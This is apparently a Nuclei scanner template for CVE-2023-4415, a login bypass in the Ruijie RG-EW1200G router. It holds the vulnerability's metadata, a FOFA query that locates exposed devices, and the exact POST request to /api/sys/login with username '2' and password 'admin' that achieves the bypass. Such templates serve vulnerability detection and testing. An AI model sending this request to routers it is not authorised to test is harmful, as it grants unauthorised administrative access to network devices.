id: CVE-2023-4415 info: name: Ruijie RG-EW1200G Router Background - Login Bypass author: DhiyaneshDK severity: high description: | A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-4415 - https://github.com/blakespire/repoforcve/tree/main/RG-EW1200G-logic - https://vuldb.com/?ctiid.237518 - https://vuldb.com/?id.237518 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-4415 cwe-id: CWE-287 epss-score: 0.00355 epss-percentile: 0.69044 cpe: cpe:2.3:o:ruijienetworks:rg-ew1200g_firmware:07161417_r483:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ruijienetworks product: rg-ew1200g_firmware fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" tags: cve2023,cve,ruijie,router,ruijienetworks http: - method: POST path: - "{{BaseURL}}/api/sys/login" body: | { "username":"2", "password":"admin", "timestamp":1695218596000 } matchers-condition: and matchers: - type: word part: body words: - '"result":"ok"' - '"msg":"登入成功"' condition: and - type: word part: header words: - application/json - type: status status: - 200 # digest: 4b0a00483046022100f4a0364d29e6d0e864db602feaaae08fc127111b3fec57f533478cf3e87a10ca022100bbcf82e6d3554f4b048f608fede70c8cd68e70453354e55f9644a720664e29d3:922c64590222798bb761d5b6d8e72950